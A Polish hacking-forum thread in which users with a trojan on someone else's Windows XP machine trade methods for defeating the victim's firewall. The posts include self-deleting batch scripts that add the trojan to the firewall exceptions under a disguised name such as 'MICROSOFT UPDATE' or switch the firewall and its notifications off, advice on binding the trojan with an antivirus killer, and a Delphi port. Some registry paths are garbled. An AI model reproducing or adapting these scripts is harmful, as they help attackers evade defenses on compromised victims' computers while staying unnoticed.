firewall

[kordek]

mam u kolesia trojana i nad nim kotrole czy mogw wyłąćzyć windowsowskiego firewala na xp ? i jak to zrobic?

 

[rafal]

mozesz jedynie wylaczyc z poziomu rejestru , albo zabic odpowiedni proces svchost , gdyz firewall z windowsa to uruchomiony svchost z parametrem... tyle ze na liscie procesow jest kilka svchost wiec szansa na trafienie jest w 1 do 5, zle trafisz pada system

----
mozesz jeszcze dodac dowolny program do wyjatkow firewall'a co jest znacznie lepsza metoda , gdyz brak firewall'a mozna latwo zauwazyc a dodanie do wyjatkow nie

 

[Ewenement]

Mam pytanko czy ggt mi pujdzie jak serwer jest w innej sieci osiedlowej bez problemu ęde mógł korzystać z niego ?

 

[Ewenement]

Skąd wziąść taki program dodający firewalla do wyjątków
(wtedy nie zatrzyma firewall np wspomagacza ?)

 

[rafal]

w moim trojanie jest taka opcja , ale jesli nie chce Ci sie instalowac dodatkowego trojana to wystarczy zrobic plik bat dodajacy program do rejestru.
Dam tu przyklad bo moze sie komus przyda

1. Dodanie dowolnego programu do wyjatkow FW :

zawartosc pliku sp2.bat



@echo off  

echo REGEDIT4 >>sp2.reg 

echo. >>sp2.reg 

echo [HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallP
olicyStandardProfileAuthorizedApplicationsList] >>sp2.reg 

echo "C:windowsshit.exe"="C:windowsshit.exe:*:Enabled:shit" >>sp2.reg 

echo. >>sp2.reg 

regedit /s sp2.reg  

del sp2.reg >nul 

del sp2.bat >nul

"C:windowsshit.exe"="C:windowsshit.exe:*:Enabled:shit"
sciezki dostepu mozna zmieniac dowoli, ale obydwie musza byc takei same
Enabled - oznacza ze ma byc wlaczony dostep dla programu z danej lokalizacji, SHIT po warunku dopuszczenie oznacza pod jaka nazwa ma byc widoczny program na liscie wyjatkow z FW , jego nazwa moze byc dowolna np: POMOC ZDALNA , MICROSOFT UPDATE czy cus

2. Wylaczenie FW :

zawartosc pliku sp2off.bat



@echo off  

echo REGEDIT4 >>sp2.reg 

echo. >>sp2.reg 

echo [HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallP
olicyStandardProfile] >>sp2.reg 

echo "EnableFirewall"=dword:00000000  >>sp2.reg 

echo "DoNotAllowExceptions"=dword:00000001  >>sp2.reg 

echo "DisableNotifications"=dword:00000000  >>sp2.reg 

echo. >>sp2.reg 

regedit /s sp2.reg  

del sp2.reg >nul 

del sp2off.bat >nul

EnableFirewall - wartosc 0 wylacza FW
DoNotAllowExceptions - wartosc 1 wylacza wyjatki
DisableNotifications - wartosc 0 wylacza pomiadamianie

Pisalem to z paly wiec moglem sie gdzies machnac , nom ale bat jest najlepsza opcja bo szkoda pisac program z konfiguratorem skoro nic tak malo nie zajmuje jak bat

 

[Ewenement]

oznacza ze ma byc wlaczony dostep dla programu z danej lokalizacji[/b]

Lokalizacji tej C:windowsshit.exe ?
Wszystko dobrze ale co ten plik wyłączy wszystkie firewalle ?

 

[rafal]

noo z tej lokalizacji...
on nie wylacza wszystkie firewalle a tylko FW z SP2 :-/ nie ma programu ktory wylacza wszystkie FW, uzyj T_Error'a Wojass'a i ustaw sobie co ma wylaczyc za FW..

 

[Ewenement]

A jak sprawdzić kto ma jakiego firewalla

Może jest jakiś program który po otwarciu wyśle rodzaj firewalla na maila ?
I jak już wiem jaki to to jak mam to w pisać w tym terrorze ;D

 

[DaKo]

A nie lepiej zbindowac trojana z jakims kilerAV i FW, ja tak zrobilem i spoko, nie pamietma z kad go sciagnolem ale jak znajde adres to podam, a nazywal sie chyba 0003.exe, ale nie jestem pewnien

 

[kanar123]

Temat stary jak swiet ale przyda sie niektórym... chciąłbym sie dowiedzec jak przerobić ten kod na jezyk delphi... bez bindowania...

 

[nitr0]

chodzi ci o te batki? po prostu odpal je z poziomu delphi xD np shellexecute

 

[kanar123]

NIe juz zrobiłem takie cos:

Reg:=TRegistry.Create;
Reg.RootKey:=HKEY_LOCAL_MASCHINE;
Reg.OpenKey('\System\Controlset001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\Authorized',true);
Reg.WriteString('program', 'C:\program.exe');
Reg.CloseKey;
Reg.Free;

tylko jak zapisac do tego wpisu wartość binarna??